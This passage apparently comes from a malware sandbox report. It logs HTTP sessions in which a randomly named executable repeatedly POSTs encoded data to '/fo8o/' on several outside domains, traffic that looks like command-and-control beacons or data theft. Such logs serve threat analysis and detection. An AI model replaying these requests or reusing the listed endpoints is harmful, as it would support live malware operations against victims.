                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.rssnewscast.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:52:47.659691095 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          date: Thu, 19 Dec 2024 06:52:47 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          transfer-encoding: chunked
                                                                                          vary: Accept-Encoding
                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          pragma: no-cache
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q5hbCeY1ujfHw6H4vxzttAG+zR9plkTuySXStPpmqE7G5S64ZgoV6Vq4lnD1K1pW0c5t6OTfLcY5dpXouALz9w==
                                                                                          last-modified: Thu, 19 Dec 2024 06:52:47 GMT
                                                                                          x-cache-miss-from: parking-dc6db864f-df75c
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 71 35 68 62 43 65 59 31 75 6a 66 48 77 36 48 34 76 78 7a 74 74 41 47 2b 7a 52 39 70 6c 6b 54 75 79 53 58 53 74 50 70 6d 71 45 37 47 35 53 36 34 5a 67 6f 56 36 56 71 34 6c 6e 44 31 4b 31 70 57 30 63 35 74 36 4f 54 66 4c 63 59 35 64 70 58 6f 75 41 4c 7a 39 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                          Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q5hbCeY1ujfHw6H4vxzttAG+zR9plkTuySXStPpmqE7G5S64ZgoV6Vq4lnD1K1pW0c5t6OTfLcY5dpXouALz9w==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                          Dec 19, 2024 07:52:47.659706116 CET | 224 | IN | Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                          Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" h
                                                                                          Dec 19, 2024 07:52:47.659785032 CET | 1236 | IN | Data Raw: 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                                                          Data Ascii: ref="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 | MIT Lic
                                                                                          Dec 19, 2024 07:52:47.659822941 CET | 1236 | IN | Data Raw: 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72
                                                                                          Data Ascii: ptgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button1D17,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butt
                                                                                          Dec 19, 2024 07:52:47.659835100 CET | 1236 | IN | Data Raw: 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a
                                                                                          Data Ascii: }[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#7171
                                                                                          Dec 19, 2024 07:52:47.659895897 CET | 1236 | IN | Data Raw: 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f
                                                                                          Data Ascii: lates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a48ff}.t
                                                                                          Dec 19, 2024 07:52:47.659909010 CET | 1236 | IN | Data Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e
                                                                                          Data Ascii: xt-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buyb
                                                                                          Dec 19, 2024 07:52:47.659919977 CET | 1236 | IN | Data Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f
                                                                                          Data Ascii: display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__
                                                                                          Dec 19, 2024 07:52:47.659931898 CET | 1236 | IN | Data Raw: 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b
                                                                                          Data Ascii: ;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;mar
                                                                                          Dec 19, 2024 07:52:47.660079002 CET | 1236 | IN | Data Raw: 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62
                                                                                          Data Ascii: y-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;borAECder-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{positio
                                                                                          Dec 19, 2024 07:52:47.779443979 CET | 1236 | IN | Data Raw: 22 73 69 6e 67 6c 65 44 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 50 72 69 63 65 22 3a
                                                                                          Data Ascii: "singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          13 | 192.168.2.5 | 49989 | 66.29.149.46 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:01.863102913 CET | 786 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                          Dec 19, 2024 07:53:03.071779966 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:02 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          14 | 192.168.2.5 | 49990 | 66.29.149.46 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:04.508168936 CET | 806 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                          Dec 19, 2024 07:53:05.739797115 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:05 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          15 | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:07.366470098 CET | 1823 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVz [TRUNCATED]
                                                                                          Dec 19, 2024 07:53:08.604063034 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:08 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          16 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:10.012969017 CET | 524 | OUT | GET /fo8o/?UT5tTdKX=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&sLRH=86fTArmPbL HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.techchains.info
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:53:11.238378048 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:11 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          17 | 192.168.2.5 | 49993 | 195.110.124.133 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:17.246478081 CET | 804 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                          Dec 19, 2024 07:53:18.555402994 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:18 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          18 | 192.168.2.5 | 49994 | 195.110.124.133 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:19.906855106 CET | 824 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                          Dec 19, 2024 07:53:21.215508938 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:21 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          19 | 192.168.2.5 | 49995 | 195.110.124.133 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:53:22.633655071 CET | 1841 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Origin: http://www.elettrosistemista.zip
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
